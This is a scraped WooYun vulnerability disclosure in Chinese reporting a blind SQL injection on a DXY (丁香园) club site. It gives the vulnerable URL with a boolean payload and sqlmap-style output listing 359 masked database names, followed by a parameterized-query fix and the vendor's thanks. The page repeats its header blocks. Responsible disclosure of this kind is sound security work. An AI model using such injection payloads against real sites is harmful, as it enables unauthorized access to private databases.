丁香园某站SQL注入（涉及359个数据库）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0189871

漏洞标题：丁香园某站SQL注入（涉及359个数据库）

漏洞作者： Manning

提交时间：2016-03-28 09:21

修复时间：2016-05-12 10:26

公开时间：2016-05-12 10:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-28：细节已通知厂商并且等待厂商处理中
2016-03-28：厂商已经确认，细节仅向厂商公开
2016-04-07：细节向核心白帽子及相关领域专家公开
2016-04-17：细节向普通白帽子公开
2016-04-27：细节向实习白帽子公开
2016-05-12：细节向公众公开

简要描述：

看到数据库个数的时候，小伙伴们都惊呆了。

详细说明：

挖了很多次丁香园的漏洞，每次都有礼物，于是开心的又扫了一次，很震惊，这份数据要是被拖，丁香园在舆论上也不好收场了吧。
希望这次丁香园重视这个漏洞。
ps：那个钢笔不要好使，漏水。
http://club.dxy.cn/littmann/rank/top/3
Payload: http://club.dxy.cn:80/littmann/rank/top/3 AND 6857=6857

漏洞证明：

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://club.dxy.cn:80/littmann/rank/top/3 AND 6857=6857
---
[08:14:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
available databases [359]:


mask 区域

*****i_sp*****
*****mart*****
*****2_aixi*****
*****_201*****
*****_abb*****
*****_abb*****
*****_abb*****
*****_abt*****
*****_acs*****
*****_acs*****
*****ctemr*****
*****_act*****
*****iz_*****
*****_adi*****
*****finit*****
*****finit*****
*****iz_*****
*****_aiq*****
*****_ait*****
*****_aix*****
*****llerg*****
*****ngioc*****
*****nsell*****
*****omei2*****
*****ppcc2*****
*****iz_*****
*****_ari*****
*****trove*****
*****vasti*****
*****znews*****
*****_azp*****
*****asali*****
*****_bas*****
*****_bax*****
*****axter*****
*****axter*****
*****axter*****
*****_bay*****
*****ayer2*****
*****iz_*****
*****eckse*****
*****_bic*****
*****_bif*****
*****_bil*****
*****iliji*****
*****ioins*****
*****_bio*****
*****iosur*****
*****iz_*****
*****onehe*****
*****qekfp*****
*****reast*****
*****scbre*****
*****_cac*****
*****iz_*****
*****_cah*****
*****albon*****
*****iz_*****
*****iz_*****
*****_car*****
*****_cel*****
*****elebr*****
*****ialis*****
*****_ckd*****
*****_cla*****
*****_cla*****
*****_cme*****
*****iz_*****
*****iz_*****
*****iz_*****
*****_dal*****
*****iz_*****
*****_dia*****
*****_dia*****
*****_dmf*****
*****mfund*****
*****iz_*****
*****pp4ca*****
*****_dru*****
*****_dxy*****
*****xyplu*****
*****_dxy*****
*****iz_*****
*****chelo*****
*****iz_*****
*****iz_*****
*****_enb*****
*****_ene*****
*****_epi*****
*****_est*****
*****_eth*****
*****thico*****
*****_eve*****
*****_exa*****
*****irstr*****
*****_flu*****
*****_for*****
*****_gc2*****
*****_gec*****
*****_geh*****
*****_ger*****
*****iz_*****
*****icanc*****
*****iz_*****
*****_gio*****
*****_gio*****
*****_gli*****
*****m2015*****
*****_gol*****
*****_gol*****
*****_gol*****
*****_gol*****
*****iz_*****
*****_gum*****
*****ansoh*****
*****armon*****
*****armon*****
*****armon*****
*****_hbd*****
*****iz_*****
*****atolog*****
*****iz_*****
*****ongji*****
*****iz_*****
*****iz_*****
*****uirui*****
*****iz_*****
*****iz_*****
*****_ime*****
*****_int*****
*****iz_*****
*****_ire*****
*****iz_*****
*****iz_*****
*****iz_*****
*****iz_*****
*****anseh*****
*****sehuha*****
*****_ldr*****
*****_lei*****
*****_ler*****
*****_lit*****
*****ittma*****
*****iz_*****
*****_lvy*****
*****iz_*****
*****_med*****
*****_med*****
*****erck2*****
*****oprolo*****
*****oprolo*****
*****iz_*****
*****_mvd*****
*****iz_*****
*****_nor*****
*****_nsc*****
*****utric*****
*****_ome*****
*****_ong*****
*****nglyz*****
*****pfrac*****
*****range*****
*****hovide*****
*****hovide*****
*****_otc*****
*****_oxy*****
*****_pac*****
*****orange*****
*****iz_*****
*****_pci*****
*****_pci*****
*****iatric*****
*****eimee*****
*****sonalb*****
*****fizer*****
*****zerblo*****
*****_phi*****
*****hilip*****
*****hilip*****
*****hilip*****
*****lips20*****
*****lipsin*****
*****_pil*****
*****lural*****
*****rilig*****
*****ecrui*****
*****espir*****
*****evcar*****
*****_sai*****
*****_sav*****
*****ccccd*****
*****_sea*****
*****ihuan*****
*****mart_*****
*****rt_lab*****
*****iz_*****
*****_spa*****
*****iz_*****
*****iz_*****
*****szg_f*****
*****perazo*****
*****_sur*****
*****echpo*****
*****_thy*****
*****roidsc*****
*****_tia*****
*****ianpu*****
*****_tia*****
*****_tia*****
*****_tou*****
*****_tra*****
*****_ucb*****
*****cbsma*****
*****iz_*****
*****_unf*****
*****_uni*****
*****_vir*****
*****iz_*****
*****_wei*****
*****_whd*****
*****_wls*****
*****uyang*****
*****_xar*****
*****arelt*****
*****_xfx*****
*****_xil*****
*****inhai*****
*****srhd2*****
*****_yay*****
*****iz_*****
*****_yea*****
*****_yiy*****
*****iz_*****
*****_ysl*****
*****iz_*****
*****_zgh*****
*****_zhi*****
*****_zhu*****
*****huole*****
*****_zhu*****
*****astc*****
*****nasa*****
*****pa_his*****
*****b_4y*****
*****b_5y*****
*****abcam*****
*****abcam*****
*****b_ac*****
*****b_ac*****
*****aktac*****
*****lub*****
*****b_be*****
*****beckm*****
*****mancoul*****
*****ckmano*****
*****b_bg*****
*****b_bi*****
*****biohi*****
*****biotr*****
*****b_bk*****
*****brand*****
*****b_ca*****
*****psugel*****
*****cellt*****
*****b_cs*****
*****b_cs*****
*****b_cs*****
*****delta*****
*****drago*****
*****b_ed*****
*****edita*****
*****edita*****
*****pendor*****
*****b_ev*****
*****foreg*****
*****b_gc*****
*****b_ge*****
*****ge201*****
*****b_ge*****
*****gecar*****
*****gehcc*****
*****gehci*****
*****intell*****
*****b_ha*****
*****hanbi*****
*****hanbi*****
*****b_hr*****
*****bribio*****
*****illum*****
*****lumina*****
*****lumina*****
*****lumina*****
*****stina_m*****
*****b_je*****
*****b_jo*****
*****journ*****
*****keyge*****
*****kz3m2*****
*****fe_pcr*****
*****veeppe*****
*****marke*****
*****dicine*****
*****b_mp*****
*****uronbi*****
*****belpri*****
*****cleoco*****
*****biotec*****
*****biotec*****
*****oemet*****
*****omega*****
*****ega3tr*****
*****lub*****
*****pro20*****
*****pro20*****
*****pro20*****
*****pro20*****
*****pro20*****
*****pro20*****
*****pro20*****
*****promo*****
*****quant*****
*****diomet*****
*****raini*****
*****roche*****
*****roche*****
*****roche*****
*****b_ro*****
*****rtoriu*****
*****b_sb*****
*****lub*****
*****b_st*****
*****person*****
*****b_ta*****
*****vipot*****
*****viroc*****
*****b_wa*****
*****b_we*****
*****b_wo*****
*****tms*****
*****eurol*****
*****_biow*****
*****_life*****
*****_lumi*****
*****uminex*****
*****_oebi*****
*****ub_t*****
*****nli*****
*****ole*****
*****tion_s*****
*****ini*****
*****isit*****
*****isit*****
*****ysq*****
*****ati*****
*****ance_s*****
*****mar*****
*****eba*****
*****al_st*****
***** w*****

修复方案：

参数化查询

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-03-28 10:26

厂商回复：

感谢大牛！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0189871

漏洞标题：丁香园某站SQL注入（涉及359个数据库）

相关厂商：丁香园

漏洞作者： Manning

提交时间：2016-03-28 09:21

修复时间：2016-05-12 10:26

公开时间：2016-05-12 10:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0189871

漏洞标题：丁香园某站SQL注入（涉及359个数据库）

相关厂商：丁香园

漏洞作者： Manning

提交时间：2016-03-28 09:21

修复时间：2016-05-12 10:26

公开时间：2016-05-12 10:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0189871"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：